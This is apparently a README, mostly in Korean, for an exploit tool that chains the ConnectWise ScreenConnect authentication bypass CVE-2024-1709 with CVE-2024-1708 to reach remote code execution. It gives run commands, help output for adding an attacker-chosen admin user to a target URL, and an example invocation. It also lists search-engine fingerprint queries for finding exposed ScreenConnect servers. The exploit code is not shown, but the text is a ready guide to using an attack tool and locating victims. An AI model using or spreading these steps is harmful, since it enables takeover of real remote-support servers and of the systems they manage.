
ScreenConnect 인증 우회(cve-2024-1709) --> RCE!!!
저는 Python3.9을 사용하고 있습니다.
pip install requests
# python check.py
python batchAdduser.py

python ScreenConnect-AuthBypass-RCE.py -h
usage: ScreenConnect-AuthBypass-RCE.py [-h] [-u USERNAME] [-p PASSWORD] -t TARGET [-d DOMAIN] [--proxy PROXY]
CVE-2024-1708 && CVE-2024-1709 --> RCE!!!
optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
username you want to add
-p PASSWORD, --password PASSWORD
password you want to add
-t TARGET, --target TARGET
target url
-d DOMAIN, --domain DOMAIN
Description of domain
--proxy PROXY eg: http://127.0.0.1:8080
예를 들어:
python ScreenConnect-AuthBypass-RCE.py -t http://192.168.9.100

다음과 같은 상황이 발생하면, 해당 사이트에서 이 스크립트를 통한 RCE가 불가능하다는 것을 의미합니다.

구체적인 이유는 다음에서 확인할 수 있습니다:

합법적인 서명을 얻을 수 있다면, 이슈를 등록해 주세요. 대단히 감사합니다.
services.modules.http.headers.server:"screenconnect"
app:"ScreenConnect Remote Management Software"
services.http.response.headers:(key: `Server` and value.headers: `ScreenConnect`)
"Server: ScreenConnect"
product.name="ConnectWise ScreenConnect software"
app="ScreenConnect-Remote-Support-Software"
https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc